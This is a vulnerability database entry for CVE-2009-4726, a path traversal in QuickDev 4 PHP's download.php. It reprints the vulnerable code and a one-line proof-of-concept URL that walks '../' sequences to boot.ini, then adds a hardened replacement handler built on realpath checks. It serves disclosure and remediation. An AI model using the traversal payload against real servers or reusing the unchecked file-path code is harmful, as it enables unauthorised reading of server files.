https://www.exploit-db.com/exploits/9334
https://www.securityfocus.com/bid/42555
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-235
Quickdev 4 PHP 'download.php' Script Directory Traversal Vulnerability
Vulnerability ID | 1118243 | Vulnerability type | Path traversal |
Published | 2009-08-03 | Updated | 2009-08-03 |
CVE | CVE-2009-4726 | CNNVD | CNNVD-201003-235 |
Platform | PHP | CVSS score | 5.0 |
|Source
|Details
The download.php script in Quickdev4PHP contains a directory traversal vulnerability: the value of the file parameter is appended unchecked to the document root, so a remote attacker can supply ".." sequences in that parameter to step out of the web root and read any file the web server process can read.
|Exploit
#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#####################################################################################
[+] Download : http://sourceforge.net/projects/quickdev4php/files/
[+] Arbitrary File Download
- Vulnerable code in download.php
--------------------------------------------------------------------------
<?php
// $_REQUEST['file'] (GET, POST or cookie) is concatenated unchecked onto
// DOCUMENT_ROOT, so "../" sequences in it walk out of the web root.
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);   // the @ hides any warning when the traversed path fails to open
die();
--------------------------------------------------------------------------
- PoC
http://127.0.0.1/download.php?file=../../../../../../boot.ini
#####################################################################################
# milw0rm.com [2009-08-03]
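The following is an added example of how the handler above can be hardened; it is not code from QuickDev 4 PHP or from the exploit author. It assumes a dedicated download directory `$downloadDir` (hypothetical name, here `DOCUMENT_ROOT/downloads`) and keeps the same `file` parameter. Two facts about the original matter for both testing and fixing it: `$_REQUEST` also honours POST and cookie values, so a detection that only inspects the query string will miss some payloads, and `$_SERVER['DOCUMENT_ROOT']` normally has no trailing slash, so exactly how a payload's first path component joins onto the root decides whether a given traversal string resolves. The hardened version below does not depend on either point: it discards every client-supplied directory component, canonicalises with `realpath()`, and then checks that the result still lies under the allowed base.

```php
<?php
// Added example, not QuickDev 4 PHP's own code.
// Resolve a client-supplied file name to a path inside $downloadDir, or null.
function resolveDownload(string $downloadDir, string $requested): ?string
{
    // Canonicalise the allowed base first. realpath() returns false if the
    // directory does not exist; treat that as a hard failure, not an open door.
    $base = realpath($downloadDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // A NUL byte would truncate the path in the underlying C calls.
    if (strpos($requested, "\0") !== false) {
        return null;
    }

    // Only the final path component is honoured: "../", absolute paths and
    // drive letters supplied by the client are discarded here.
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }

    // realpath() resolves symlinks and any remaining "..", and returns false
    // for non-existent files, so the prefix comparison against $base is
    // reliable even if something inside the download directory links outward.
    $full = realpath($base . $name);
    if ($full === false || strncmp($full, $base, strlen($base)) !== 0) {
        return null;
    }
    if (!is_file($full) || !is_readable($full)) {
        return null;
    }
    return $full;
}

// Request handling equivalent to the original headers + readfile(), but only
// for a path that passed the checks above. $_GET is used deliberately so that
// POST bodies and cookies cannot smuggle the parameter in.
$downloadDir = $_SERVER['DOCUMENT_ROOT'] . '/downloads';   // assumed location
$path = resolveDownload($downloadDir, (string)($_GET['file'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('Content-Length: ' . (string)filesize($path));
readfile($path);
exit;
```

With this in place, `download.php?file=../../../../../../boot.ini` reduces to the single name `boot.ini` looked up under the download directory, and a request for any file outside that directory, whether via `..`, an absolute path, or a symlink placed inside the directory, yields a 404. Keeping the `realpath()` prefix check even though `basename()` already strips directories is intentional: it is the check that survives if someone later relaxes the name handling to allow subdirectories.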
|Affected products
Olivier Michaud and Pierre-Yves QuickDev 4 Php 0
|References
Source: VUPEN
Name: ADV-2009-2126
Link: http://www.vupen.com/english/advisories/2009/2126
Source: MILW0RM
Name: 9334
Link: http://www.milw0rm.com/exploits/9334
Source: SECUNIA
Name: 36130
Link: http://secunia.com/advisories/36130